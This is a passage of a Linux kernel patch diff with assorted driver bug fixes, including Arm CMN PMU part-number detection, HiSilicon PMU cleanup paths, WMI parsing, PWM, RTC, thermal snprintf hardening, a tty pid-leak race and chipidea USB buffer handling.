+ 		if (e->model & model && e->type == type && e->eventid == eventid)
+ 			return e->fsel;
+@@ -1570,12 +1600,12 @@ static int arm_cmn_event_init(struct perf_event *event)
+ 		/* ...but the DTM may depend on which port we're watching */
+ 		if (cmn->multi_dtm)
+ 			hw->dtm_offset = CMN_EVENT_WP_DEV_SEL(event) / 2;
+-	} else if (type == CMN_TYPE_XP && cmn->model == CMN700) {
++	} else if (type == CMN_TYPE_XP && cmn->part == PART_CMN700) {
+ 		hw->wide_sel = true;
+ 	}
+ 
+ 	/* This is sufficiently annoying to recalculate, so cache it */
+-	hw->filter_sel = arm_cmn_filter_sel(cmn->model, type, eventid);
++	hw->filter_sel = arm_cmn_filter_sel(cmn, type, eventid);
+ 
+ 	bynodeid = CMN_EVENT_BYNODEID(event);
+ 	nodeid = CMN_EVENT_NODEID(event);
+@@ -1966,6 +1996,16 @@ static int arm_cmn_init_dtcs(struct arm_cmn *cmn)
+ 	return 0;
+ }
+ 
++static unsigned int arm_cmn_dtc_domain(struct arm_cmn *cmn, void __iomem *xp_region)
++{
++	int offset = CMN_DTM_UNIT_INFO;
++
++	if (cmn->part == PART_CMN650 || cmn->part == PART_CI700)
++		offset = CMN650_DTM_UNIT_INFO;
++
++	return FIELD_GET(CMN_DTM_UNIT_INFO_DTC_DOMAIN, readl_relaxed(xp_region + offset));
++}
++
+ static void arm_cmn_init_node_info(struct arm_cmn *cmn, u32 offset, struct arm_cmn_node *node)
+ {
+ 	int level;
+@@ -2006,6 +2046,7 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 	void __iomem *cfg_region;
+ 	struct arm_cmn_node cfg, *dn;
+ 	struct arm_cmn_dtm *dtm;
++	enum cmn_part part;
+ 	u16 child_count, child_poff;
+ 	u32 xp_offset[CMN_MAX_XPS];
+ 	u64 reg;
+@@ -2017,7 +2058,19 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 		return -ENODEV;
+ 
+ 	cfg_region = cmn->base + rgn_offset;
+-	reg = readl_relaxed(cfg_region + CMN_CFGM_PERIPH_ID_2);
++
++	reg = readq_relaxed(cfg_region + CMN_CFGM_PERIPH_ID_01);
++	part = FIELD_GET(CMN_CFGM_PID0_PART_0, reg);
++	part |= FIELD_GET(CMN_CFGM_PID1_PART_1, reg) << 8;
++	if (cmn->part && cmn->part != part)
++		dev_warn(cmn->dev,
++			 "Firmware binding mismatch: expected part number 0x%x, found 0x%x\n",
++			 cmn->part, part);
++	cmn->part = part;
++	if (!arm_cmn_model(cmn))
++		dev_warn(cmn->dev, "Unknown part number: 0x%x\n", part);
++
++	reg = readl_relaxed(cfg_region + CMN_CFGM_PERIPH_ID_23);
+ 	cmn->rev = FIELD_GET(CMN_CFGM_PID2_REVISION, reg);
+ 
+ 	reg = readq_relaxed(cfg_region + CMN_CFGM_INFO_GLOBAL);
+@@ -2081,10 +2134,10 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 		if (xp->id == (1 << 3))
+ 			cmn->mesh_x = xp->logid;
+ 
+-		if (cmn->model == CMN600)
++		if (cmn->part == PART_CMN600)
+ 			xp->dtc = 0xf;
+ 		else
+-			xp->dtc = 1 << readl_relaxed(xp_region + CMN_DTM_UNIT_INFO);
++			xp->dtc = 1 << arm_cmn_dtc_domain(cmn, xp_region);
+ 
+ 		xp->dtm = dtm - cmn->dtms;
+ 		arm_cmn_init_dtm(dtm++, xp, 0);
+@@ -2201,7 +2254,7 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 	if (cmn->num_xps == 1)
+ 		dev_warn(cmn->dev, "1x1 config not fully supported, translate XP events manually\n");
+ 
+-	dev_dbg(cmn->dev, "model %d, periph_id_2 revision %d\n", cmn->model, cmn->rev);
++	dev_dbg(cmn->dev, "periph_id part 0x%03x revision %d\n", cmn->part, cmn->rev);
+ 	reg = cmn->ports_used;
+ 	dev_dbg(cmn->dev, "mesh %dx%d, ID width %d, ports %6pbl%s\n",
+ 		cmn->mesh_x, cmn->mesh_y, arm_cmn_xyidbits(cmn), &reg,
+@@ -2256,17 +2309,17 @@ static int arm_cmn_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	cmn->dev = &pdev->dev;
+-	cmn->model = (unsigned long)device_get_match_data(cmn->dev);
++	cmn->part = (unsigned long)device_get_match_data(cmn->dev);
+ 	platform_set_drvdata(pdev, cmn);
+ 
+-	if (cmn->model == CMN600 && has_acpi_companion(cmn->dev)) {
++	if (cmn->part == PART_CMN600 && has_acpi_companion(cmn->dev)) {
+ 		rootnode = arm_cmn600_acpi_probe(pdev, cmn);
+ 	} else {
+ 		rootnode = 0;
+ 		cmn->base = devm_platform_ioremap_resource(pdev, 0);
+ 		if (IS_ERR(cmn->base))
+ 			return PTR_ERR(cmn->base);
+-		if (cmn->model == CMN600)
++		if (cmn->part == PART_CMN600)
+ 			rootnode = arm_cmn600_of_probe(pdev->dev.of_node);
+ 	}
+ 	if (rootnode < 0)
+@@ -2335,10 +2388,10 @@ static int arm_cmn_remove(struct platform_device *pdev)
+ 
+ #ifdef CONFIG_OF
+ static const struct of_device_id arm_cmn_of_match[] = {
+-	{ .compatible = "arm,cmn-600", .data = (void *)CMN600 },
+-	{ .compatible = "arm,cmn-650", .data = (void *)CMN650 },
+-	{ .compatible = "arm,cmn-700", .data = (void *)CMN700 },
+-	{ .compatible = "arm,ci-700", .data = (void *)CI700 },
++	{ .compatible = "arm,cmn-600", .data = (void *)PART_CMN600 },
++	{ .compatible = "arm,cmn-650" },
++	{ .compatible = "arm,cmn-700" },
++	{ .compatible = "arm,ci-700" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, arm_cmn_of_match);
+@@ -2346,9 +2399,9 @@ MODULE_DEVICE_TABLE(of, arm_cmn_of_match);
+ 
+ #ifdef CONFIG_ACPI
+ static const struct acpi_device_id arm_cmn_acpi_match[] = {
+-	{ "ARMHC600", CMN600 },
+-	{ "ARMHC650", CMN650 },
+-	{ "ARMHC700", CMN700 },
++	{ "ARMHC600", PART_CMN600 },
++	{ "ARMHC650" },
++	{ "ARMHC700" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(acpi, arm_cmn_acpi_match);
+diff --git a/drivers/perf/hisilicon/hisi_pcie_pmu.c b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+index b61f1f9aba214..c4c1cd269c577 100644
+--- a/drivers/perf/hisilicon/hisi_pcie_pmu.c
++++ b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+@@ -342,6 +342,10 @@ static int hisi_pcie_pmu_event_init(struct perf_event *event)
+ 	struct hisi_pcie_pmu *pcie_pmu = to_pcie_pmu(event->pmu);
+ 	struct hw_perf_event *hwc = &event->hw;
+ 
++	/* Check the type first before going on, otherwise it's not our event */
++	if (event->attr.type != event->pmu->type)
++		return -ENOENT;
++
+ 	event->cpu = pcie_pmu->on_cpu;
+ 
+ 	if (EXT_COUNTER_IS_USED(hisi_pcie_get_event(event)))
+@@ -349,9 +353,6 @@ static int hisi_pcie_pmu_event_init(struct perf_event *event)
+ 	else
+ 		hwc->event_base = HISI_PCIE_CNT;
+ 
+-	if (event->attr.type != event->pmu->type)
+-		return -ENOENT;
+-
+ 	/* Sampling is not supported. */
+ 	if (is_sampling_event(event) || event->attach_state & PERF_ATTACH_TASK)
+ 		return -EOPNOTSUPP;
+diff --git a/drivers/perf/hisilicon/hisi_uncore_pa_pmu.c b/drivers/perf/hisilicon/hisi_uncore_pa_pmu.c
+index 47d3cc9b6eecd..d385234fa28df 100644
+--- a/drivers/perf/hisilicon/hisi_uncore_pa_pmu.c
++++ b/drivers/perf/hisilicon/hisi_uncore_pa_pmu.c
+@@ -416,8 +416,8 @@ static int hisi_pa_pmu_probe(struct platform_device *pdev)
+ 	ret = perf_pmu_register(&pa_pmu->pmu, name, -1);
+ 	if (ret) {
+ 		dev_err(pa_pmu->dev, "PMU register failed, ret = %d\n", ret);
+-		cpuhp_state_remove_instance(CPUHP_AP_PERF_ARM_HISI_PA_ONLINE,
+-					    &pa_pmu->node);
++		cpuhp_state_remove_instance_nocalls(CPUHP_AP_PERF_ARM_HISI_PA_ONLINE,
++						    &pa_pmu->node);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/perf/hisilicon/hisi_uncore_sllc_pmu.c b/drivers/perf/hisilicon/hisi_uncore_sllc_pmu.c
+index b9c79f17230c2..7d363d475deb2 100644
+--- a/drivers/perf/hisilicon/hisi_uncore_sllc_pmu.c
++++ b/drivers/perf/hisilicon/hisi_uncore_sllc_pmu.c
+@@ -450,8 +450,8 @@ static int hisi_sllc_pmu_probe(struct platform_device *pdev)
+ 	ret = perf_pmu_register(&sllc_pmu->pmu, name, -1);
+ 	if (ret) {
+ 		dev_err(sllc_pmu->dev, "PMU register failed, ret = %d\n", ret);
+-		cpuhp_state_remove_instance(CPUHP_AP_PERF_ARM_HISI_SLLC_ONLINE,
+-					    &sllc_pmu->node);
++		cpuhp_state_remove_instance_nocalls(CPUHP_AP_PERF_ARM_HISI_SLLC_ONLINE,
++						    &sllc_pmu->node);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/perf/hisilicon/hns3_pmu.c b/drivers/perf/hisilicon/hns3_pmu.c
+index e0457d84af6b3..16869bf5bf4cc 100644
+--- a/drivers/perf/hisilicon/hns3_pmu.c
++++ b/drivers/perf/hisilicon/hns3_pmu.c
+@@ -1556,8 +1556,8 @@ static int hns3_pmu_init_pmu(struct pci_dev *pdev, struct hns3_pmu *hns3_pmu)
+ 	ret = perf_pmu_register(&hns3_pmu->pmu, hns3_pmu->pmu.name, -1);
+ 	if (ret) {
+ 		pci_err(pdev, "failed to register perf PMU, ret = %d.\n", ret);
+-		cpuhp_state_remove_instance(CPUHP_AP_PERF_ARM_HNS3_PMU_ONLINE,
+-					    &hns3_pmu->node);
++		cpuhp_state_remove_instance_nocalls(CPUHP_AP_PERF_ARM_HNS3_PMU_ONLINE,
++						    &hns3_pmu->node);
+ 	}
+ 
+ 	return ret;
+@@ -1568,8 +1568,8 @@ static void hns3_pmu_uninit_pmu(struct pci_dev *pdev)
+ 	struct hns3_pmu *hns3_pmu = pci_get_drvdata(pdev);
+ 
+ 	perf_pmu_unregister(&hns3_pmu->pmu);
+-	cpuhp_state_remove_instance(CPUHP_AP_PERF_ARM_HNS3_PMU_ONLINE,
+-				    &hns3_pmu->node);
++	cpuhp_state_remove_instance_nocalls(CPUHP_AP_PERF_ARM_HNS3_PMU_ONLINE,
++					    &hns3_pmu->node);
+ }
+ 
+ static int hns3_pmu_init_dev(struct pci_dev *pdev)
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzg2l.c b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+index 2a617832a7e60..159812fe1c97c 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzg2l.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+@@ -1173,6 +1173,8 @@ static void rzg2l_gpio_irq_disable(struct irq_data *d)
+ 	u32 port;
+ 	u8 bit;
+ 
++	irq_chip_disable_parent(d);
++
+ 	port = RZG2L_PIN_ID_TO_PORT(hwirq);
+ 	bit = RZG2L_PIN_ID_TO_PIN(hwirq);
+ 
+@@ -1187,7 +1189,6 @@ static void rzg2l_gpio_irq_disable(struct irq_data *d)
+ 	spin_unlock_irqrestore(&pctrl->lock, flags);
+ 
+ 	gpiochip_disable_irq(gc, hwirq);
+-	irq_chip_disable_parent(d);
+ }
+ 
+ static void rzg2l_gpio_irq_enable(struct irq_data *d)
+diff --git a/drivers/platform/x86/wmi.c b/drivers/platform/x86/wmi.c
+index 2fe6e147785e4..2b79377cc21e2 100644
+--- a/drivers/platform/x86/wmi.c
++++ b/drivers/platform/x86/wmi.c
+@@ -849,21 +849,13 @@ static int wmi_dev_match(struct device *dev, struct device_driver *driver)
+ }
+ static int wmi_char_open(struct inode *inode, struct file *filp)
+ {
+-	const char *driver_name = filp->f_path.dentry->d_iname;
+-	struct wmi_block *wblock;
+-	struct wmi_block *next;
+-
+-	list_for_each_entry_safe(wblock, next, &wmi_block_list, list) {
+-		if (!wblock->dev.dev.driver)
+-			continue;
+-		if (strcmp(driver_name, wblock->dev.dev.driver->name) == 0) {
+-			filp->private_data = wblock;
+-			break;
+-		}
+-	}
++	/*
++	 * The miscdevice already stores a pointer to itself
++	 * inside filp->private_data
++	 */
++	struct wmi_block *wblock = container_of(filp->private_data, struct wmi_block, char_dev);
+ 
+-	if (!filp->private_data)
+-		return -ENODEV;
++	filp->private_data = wblock;
+ 
+ 	return nonseekable_open(inode, filp);
+ }
+@@ -1212,8 +1204,8 @@ static int parse_wdg(struct device *wmi_bus_dev, struct acpi_device *device)
+ 	struct wmi_block *wblock, *next;
+ 	union acpi_object *obj;
+ 	acpi_status status;
+-	int retval = 0;
+ 	u32 i, total;
++	int retval;
+ 
+ 	status = acpi_evaluate_object(device->handle, "_WDG", NULL, &out);
+ 	if (ACPI_FAILURE(status))
+@@ -1224,8 +1216,8 @@ static int parse_wdg(struct device *wmi_bus_dev, struct acpi_device *device)
+ 		return -ENXIO;
+ 
+ 	if (obj->type != ACPI_TYPE_BUFFER) {
+-		retval = -ENXIO;
+-		goto out_free_pointer;
++		kfree(obj);
++		return -ENXIO;
+ 	}
+ 
+ 	gblock = (const struct guid_block *)obj->buffer.pointer;
+@@ -1240,8 +1232,8 @@ static int parse_wdg(struct device *wmi_bus_dev, struct acpi_device *device)
+ 
+ 		wblock = kzalloc(sizeof(*wblock), GFP_KERNEL);
+ 		if (!wblock) {
+-			retval = -ENOMEM;
+-			break;
++			dev_err(wmi_bus_dev, "Failed to allocate %pUL\n", &gblock[i].guid);
++			continue;
+ 		}
+ 
+ 		wblock->acpi_device = device;
+@@ -1280,9 +1272,9 @@ static int parse_wdg(struct device *wmi_bus_dev, struct acpi_device *device)
+ 		}
+ 	}
+ 
+-out_free_pointer:
+-	kfree(out.pointer);
+-	return retval;
++	kfree(obj);
++
++	return 0;
+ }
+ 
+ /*
+diff --git a/drivers/pwm/pwm-brcmstb.c b/drivers/pwm/pwm-brcmstb.c
+index 3db3f96edf78d..6afd34d651c77 100644
+--- a/drivers/pwm/pwm-brcmstb.c
++++ b/drivers/pwm/pwm-brcmstb.c
+@@ -290,7 +290,7 @@ static int brcmstb_pwm_suspend(struct device *dev)
+ {
+ 	struct brcmstb_pwm *p = dev_get_drvdata(dev);
+ 
+-	clk_disable(p->clk);
++	clk_disable_unprepare(p->clk);
+ 
+ 	return 0;
+ }
+@@ -299,7 +299,7 @@ static int brcmstb_pwm_resume(struct device *dev)
+ {
+ 	struct brcmstb_pwm *p = dev_get_drvdata(dev);
+ 
+-	clk_enable(p->clk);
++	clk_prepare_enable(p->clk);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/pwm/pwm-sti.c b/drivers/pwm/pwm-sti.c
+index 44b1f93256b36..652fdb8dc7bfa 100644
+--- a/drivers/pwm/pwm-sti.c
++++ b/drivers/pwm/pwm-sti.c
+@@ -79,6 +79,7 @@ struct sti_pwm_compat_data {
+ 	unsigned int cpt_num_devs;
+ 	unsigned int max_pwm_cnt;
+ 	unsigned int max_prescale;
++	struct sti_cpt_ddata *ddata;
+ };
+ 
+ struct sti_pwm_chip {
+@@ -314,7 +315,7 @@ static int sti_pwm_capture(struct pwm_chip *chip, struct pwm_device *pwm,
+ {
+ 	struct sti_pwm_chip *pc = to_sti_pwmchip(chip);
+ 	struct sti_pwm_compat_data *cdata = pc->cdata;
+-	struct sti_cpt_ddata *ddata = pwm_get_chip_data(pwm);
++	struct sti_cpt_ddata *ddata = &cdata->ddata[pwm->hwpwm];
+ 	struct device *dev = pc->dev;
+ 	unsigned int effective_ticks;
+ 	unsigned long long high, low;
+@@ -440,7 +441,7 @@ static irqreturn_t sti_pwm_interrupt(int irq, void *data)
+ 	while (cpt_int_stat) {
+ 		devicenum = ffs(cpt_int_stat) - 1;
+ 
+-		ddata = pwm_get_chip_data(&pc->chip.pwms[devicenum]);
++		ddata = &pc->cdata->ddata[devicenum];
+ 
+ 		/*
+ 		 * Capture input:
+@@ -638,30 +639,28 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ 			dev_err(dev, "failed to prepare clock\n");
+ 			return ret;
+ 		}
++
++		cdata->ddata = devm_kzalloc(dev, cdata->cpt_num_devs * sizeof(*cdata->ddata), GFP_KERNEL);
++		if (!cdata->ddata)
++			return -ENOMEM;
+ 	}
+ 
+ 	pc->chip.dev = dev;
+ 	pc->chip.ops = &sti_pwm_ops;
+ 	pc->chip.npwm = pc->cdata->pwm_num_devs;
+ 
+-	ret = pwmchip_add(&pc->chip);
+-	if (ret < 0) {
+-		clk_unprepare(pc->pwm_clk);
+-		clk_unprepare(pc->cpt_clk);
+-		return ret;
+-	}
+-
+ 	for (i = 0; i < cdata->cpt_num_devs; i++) {
+-		struct sti_cpt_ddata *ddata;
+-
+-		ddata = devm_kzalloc(dev, sizeof(*ddata), GFP_KERNEL);
+-		if (!ddata)
+-			return -ENOMEM;
++		struct sti_cpt_ddata *ddata = &cdata->ddata[i];
+ 
+ 		init_waitqueue_head(&ddata->wait);
+ 		mutex_init(&ddata->lock);
++	}
+ 
+-		pwm_set_chip_data(&pc->chip.pwms[i], ddata);
++	ret = pwmchip_add(&pc->chip);
++	if (ret < 0) {
++		clk_unprepare(pc->pwm_clk);
++		clk_unprepare(pc->cpt_clk);
++		return ret;
+ 	}
+ 
+ 	platform_set_drvdata(pdev, pc);
+diff --git a/drivers/regulator/mt6358-regulator.c b/drivers/regulator/mt6358-regulator.c
+index a0441b8086712..de7b5db8f7f2d 100644
+--- a/drivers/regulator/mt6358-regulator.c
++++ b/drivers/regulator/mt6358-regulator.c
+@@ -655,12 +655,18 @@ static int mt6358_regulator_probe(struct platform_device *pdev)
+ 	struct mt6358_regulator_info *mt6358_info;
+ 	int i, max_regulator;
+ 
+-	if (mt6397->chip_id == MT6366_CHIP_ID) {
+-		max_regulator = MT6366_MAX_REGULATOR;
+-		mt6358_info = mt6366_regulators;
+-	} else {
++	switch (mt6397->chip_id) {
++	case MT6358_CHIP_ID:
+ 		max_regulator = MT6358_MAX_REGULATOR;
+ 		mt6358_info = mt6358_regulators;
++		break;
++	case MT6366_CHIP_ID:
++		max_regulator = MT6366_MAX_REGULATOR;
++		mt6358_info = mt6366_regulators;
++		break;
++	default:
++		dev_err(&pdev->dev, "unsupported chip ID: %d\n", mt6397->chip_id);
++		return -EINVAL;
+ 	}
+ 
+ 	for (i = 0; i < max_regulator; i++) {
+diff --git a/drivers/rtc/rtc-pcf85363.c b/drivers/rtc/rtc-pcf85363.c
+index c05b722f00605..0d1517cb3c62d 100644
+--- a/drivers/rtc/rtc-pcf85363.c
++++ b/drivers/rtc/rtc-pcf85363.c
+@@ -402,7 +402,7 @@ static int pcf85363_probe(struct i2c_client *client)
+ 	if (client->irq > 0) {
+ 		regmap_write(pcf85363->regmap, CTRL_FLAGS, 0);
+ 		regmap_update_bits(pcf85363->regmap, CTRL_PIN_IO,
+-				   PIN_IO_INTA_OUT, PIN_IO_INTAPM);
++				   PIN_IO_INTAPM, PIN_IO_INTA_OUT);
+ 		ret = devm_request_threaded_irq(&client->dev, client->irq,
+ 						NULL, pcf85363_rtc_handle_irq,
+ 						IRQF_TRIGGER_LOW | IRQF_ONESHOT,
+diff --git a/drivers/scsi/ibmvscsi/ibmvfc.c b/drivers/scsi/ibmvscsi/ibmvfc.c
+index 1a0c0b7289d26..41148b0430df9 100644
+--- a/drivers/scsi/ibmvscsi/ibmvfc.c
++++ b/drivers/scsi/ibmvscsi/ibmvfc.c
+@@ -22,7 +22,6 @@
+ #include <linux/bsg-lib.h>
+ #include <asm/firmware.h>
+ #include <asm/irq.h>
+-#include <asm/rtas.h>
+ #include <asm/vio.h>
+ #include <scsi/scsi.h>
+ #include <scsi/scsi_cmnd.h>
+@@ -5804,7 +5803,7 @@ static int ibmvfc_register_scsi_channel(struct ibmvfc_host *vhost,
+ irq_failed:
+ 	do {
+ 		rc = plpar_hcall_norets(H_FREE_SUB_CRQ, vdev->unit_address, scrq->cookie);
+-	} while (rtas_busy_delay(rc));
++	} while (rc == H_BUSY || H_IS_LONG_BUSY(rc));
+ reg_failed:
+ 	LEAVE;
+ 	return rc;
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 85219b5e1f416..bc400669ee022 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -778,6 +778,9 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 	u32 version;
+ 	struct regmap *regmap;
+ 
++	if (!IS_ERR(drv_data))
++		return -EBUSY;
++
+ 	drv_data = devm_kzalloc(dev, sizeof(*drv_data), GFP_KERNEL);
+ 	if (!drv_data) {
+ 		ret = -ENOMEM;
+diff --git a/drivers/spi/Kconfig b/drivers/spi/Kconfig
+index d4b969e68c314..946e2186d2448 100644
+--- a/drivers/spi/Kconfig
++++ b/drivers/spi/Kconfig
+@@ -1093,6 +1093,7 @@ config SPI_XTENSA_XTFPGA
+ config SPI_ZYNQ_QSPI
+ 	tristate "Xilinx Zynq QSPI controller"
+ 	depends on ARCH_ZYNQ || COMPILE_TEST
++	depends on SPI_MEM
+ 	help
+ 	  This enables support for the Zynq Quad SPI controller
+ 	  in master mode.
+diff --git a/drivers/spi/spi-nxp-fspi.c b/drivers/spi/spi-nxp-fspi.c
+index c7a4a3606547e..afecf69d3ceba 100644
+--- a/drivers/spi/spi-nxp-fspi.c
++++ b/drivers/spi/spi-nxp-fspi.c
+@@ -708,7 +708,7 @@ static int nxp_fspi_read_ahb(struct nxp_fspi *f, const struct spi_mem_op *op)
+ 		f->memmap_len = len > NXP_FSPI_MIN_IOMAP ?
+ 				len : NXP_FSPI_MIN_IOMAP;
+ 
+-		f->ahb_addr = ioremap_wc(f->memmap_phy + f->memmap_start,
++		f->ahb_addr = ioremap(f->memmap_phy + f->memmap_start,
+ 					 f->memmap_len);
+ 
+ 		if (!f->ahb_addr) {
+diff --git a/drivers/spi/spi-tegra20-slink.c b/drivers/spi/spi-tegra20-slink.c
+index 148043d0c2b84..24cab56ecb7fd 100644
+--- a/drivers/spi/spi-tegra20-slink.c
++++ b/drivers/spi/spi-tegra20-slink.c
+@@ -1093,6 +1093,8 @@ static int tegra_slink_probe(struct platform_device *pdev)
+ 	reset_control_deassert(tspi->rst);
+ 
+ 	spi_irq = platform_get_irq(pdev, 0);
++	if (spi_irq < 0)
++		return spi_irq;
+ 	tspi->irq = spi_irq;
+ 	ret = request_threaded_irq(tspi->irq, tegra_slink_isr,
+ 				   tegra_slink_isr_thread, IRQF_ONESHOT,
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus_hw.c b/drivers/staging/media/sunxi/cedrus/cedrus_hw.c
+index a6470a89851e3..fe5fbf6cf6314 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus_hw.c
++++ b/drivers/staging/media/sunxi/cedrus/cedrus_hw.c
+@@ -172,12 +172,12 @@ int cedrus_hw_suspend(struct device *device)
+ {
+ 	struct cedrus_dev *dev = dev_get_drvdata(device);
+ 
+-	reset_control_assert(dev->rstc);
+-
+ 	clk_disable_unprepare(dev->ram_clk);
+ 	clk_disable_unprepare(dev->mod_clk);
+ 	clk_disable_unprepare(dev->ahb_clk);
+ 
++	reset_control_assert(dev->rstc);
++
+ 	return 0;
+ }
+ 
+@@ -186,11 +186,18 @@ int cedrus_hw_resume(struct device *device)
+ 	struct cedrus_dev *dev = dev_get_drvdata(device);
+ 	int ret;
+ 
++	ret = reset_control_reset(dev->rstc);
++	if (ret) {
++		dev_err(dev->dev, "Failed to apply reset\n");
++
++		return ret;
++	}
++
+ 	ret = clk_prepare_enable(dev->ahb_clk);
+ 	if (ret) {
+ 		dev_err(dev->dev, "Failed to enable AHB clock\n");
+ 
+-		return ret;
++		goto err_rst;
+ 	}
+ 
+ 	ret = clk_prepare_enable(dev->mod_clk);
+@@ -207,21 +214,14 @@ int cedrus_hw_resume(struct device *device)
+ 		goto err_mod_clk;
+ 	}
+ 
+-	ret = reset_control_reset(dev->rstc);
+-	if (ret) {
+-		dev_err(dev->dev, "Failed to apply reset\n");
+-
+-		goto err_ram_clk;
+-	}
+-
+ 	return 0;
+ 
+-err_ram_clk:
+-	clk_disable_unprepare(dev->ram_clk);
+ err_mod_clk:
+ 	clk_disable_unprepare(dev->mod_clk);
+ err_ahb_clk:
+ 	clk_disable_unprepare(dev->ahb_clk);
++err_rst:
++	reset_control_assert(dev->rstc);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/thermal/thermal_core.c b/drivers/thermal/thermal_core.c
+index 1eae4ec719a8f..ebb36b2c72d5d 100644
+--- a/drivers/thermal/thermal_core.c
++++ b/drivers/thermal/thermal_core.c
+@@ -649,7 +649,8 @@ int thermal_zone_bind_cooling_device(struct thermal_zone_device *tz,
+ 	if (result)
+ 		goto release_ida;
+ 
+-	sprintf(dev->attr_name, "cdev%d_trip_point", dev->id);
++	snprintf(dev->attr_name, sizeof(dev->attr_name), "cdev%d_trip_point",
++		 dev->id);
+ 	sysfs_attr_init(&dev->attr.attr);
+ 	dev->attr.attr.name = dev->attr_name;
+ 	dev->attr.attr.mode = 0444;
+@@ -658,7 +659,8 @@ int thermal_zone_bind_cooling_device(struct thermal_zone_device *tz,
+ 	if (result)
+ 		goto remove_symbol_link;
+ 
+-	sprintf(dev->weight_attr_name, "cdev%d_weight", dev->id);
++	snprintf(dev->weight_attr_name, sizeof(dev->weight_attr_name),
++		 "cdev%d_weight", dev->id);
+ 	sysfs_attr_init(&dev->weight_attr.attr);
+ 	dev->weight_attr.attr.name = dev->weight_attr_name;
+ 	dev->weight_attr.attr.mode = S_IWUSR | S_IRUGO;
+diff --git a/drivers/tty/tty_jobctrl.c b/drivers/tty/tty_jobctrl.c
+index 0d04287da0984..ef8741c3e6629 100644
+--- a/drivers/tty/tty_jobctrl.c
++++ b/drivers/tty/tty_jobctrl.c
+@@ -300,12 +300,7 @@ void disassociate_ctty(int on_exit)
+ 		return;
+ 	}
+ 
+-	spin_lock_irq(&current->sighand->siglock);
+-	put_pid(current->signal->tty_old_pgrp);
+-	current->signal->tty_old_pgrp = NULL;
+-	tty = tty_kref_get(current->signal->tty);
+-	spin_unlock_irq(&current->sighand->siglock);
+-
++	tty = get_current_tty();
+ 	if (tty) {
+ 		unsigned long flags;
+ 
+@@ -320,6 +315,16 @@ void disassociate_ctty(int on_exit)
+ 		tty_kref_put(tty);
+ 	}
+ 
++	/* If tty->ctrl.pgrp is not NULL, it may be assigned to
++	 * current->signal->tty_old_pgrp in a race condition, and
++	 * cause pid memleak. Release current->signal->tty_old_pgrp
++	 * after tty->ctrl.pgrp set to NULL.
++	 */
++	spin_lock_irq(&current->sighand->siglock);
++	put_pid(current->signal->tty_old_pgrp);
++	current->signal->tty_old_pgrp = NULL;
++	spin_unlock_irq(&current->sighand->siglock);
++
+ 	/* Now clear signal->tty under the lock */
+ 	read_lock(&tasklist_lock);
+ 	session_clear_tty(task_session(current));
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 6ba4ef2c3949e..dc38d1fa77874 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -3579,7 +3579,7 @@ int ufshcd_read_string_desc(struct ufs_hba *hba, u8 desc_index,
+ 		 */
+ 		ret = utf16s_to_utf8s(uc_str->uc,
+ 				      uc_str->len - QUERY_DESC_HDR_SIZE,
+-				      UTF16_BIG_ENDIAN, str, ascii_len);
++				      UTF16_BIG_ENDIAN, str, ascii_len - 1);
+ 
+ 		/* replace non-printable or non-ASCII characters with spaces */
+ 		for (i = 0; i < ret; i++)
+diff --git a/drivers/usb/chipidea/host.c b/drivers/usb/chipidea/host.c
+index 3b08c5e811707..34bbdfadd66f3 100644
+--- a/drivers/usb/chipidea/host.c
++++ b/drivers/usb/chipidea/host.c
+@@ -30,8 +30,7 @@ struct ehci_ci_priv {
+ };
+ 
+ struct ci_hdrc_dma_aligned_buffer {
+-	void *kmalloc_ptr;
+-	void *old_xfer_buffer;
++	void *original_buffer;
+ 	u8 data[];
+ };
+ 
+@@ -380,59 +379,52 @@ static int ci_ehci_bus_suspend(struct usb_hcd *hcd)
+ 	return 0;
+ }
+ 
+-static void ci_hdrc_free_dma_aligned_buffer(struct urb *urb)
++static void ci_hdrc_free_dma_aligned_buffer(struct urb *urb, bool copy_back)
+ {
+ 	struct ci_hdrc_dma_aligned_buffer *temp;
+-	size_t length;
+ 
+ 	if (!(urb->transfer_flags & URB_ALIGNED_TEMP_BUFFER))
+ 		return;
++	urb->transfer_flags &= ~URB_ALIGNED_TEMP_BUFFER;
+ 
+ 	temp = container_of(urb->transfer_buffer,
+ 			    struct ci_hdrc_dma_aligned_buffer, data);
++	urb->transfer_buffer = temp->original_buffer;
++
++	if (copy_back && usb_urb_dir_in(urb)) {
++		size_t length;
+ 
+-	if (usb_urb_dir_in(urb)) {
+ 		if (usb_pipeisoc(urb->pipe))
+ 			length = urb->transfer_buffer_length;
+ 		else
+ 			length = urb->actual_length;
+ 
+-		memcpy(temp->old_xfer_buffer, temp->data, length);
++		memcpy(temp->original_buffer, temp->data, length);
+ 	}
+-	urb->transfer_buffer = temp->old_xfer_buffer;
+-	kfree(temp->kmalloc_ptr);
+ 
+-	urb->transfer_flags &= ~URB_ALIGNED_TEMP_BUFFER;
++	kfree(temp);
+ }
+ 
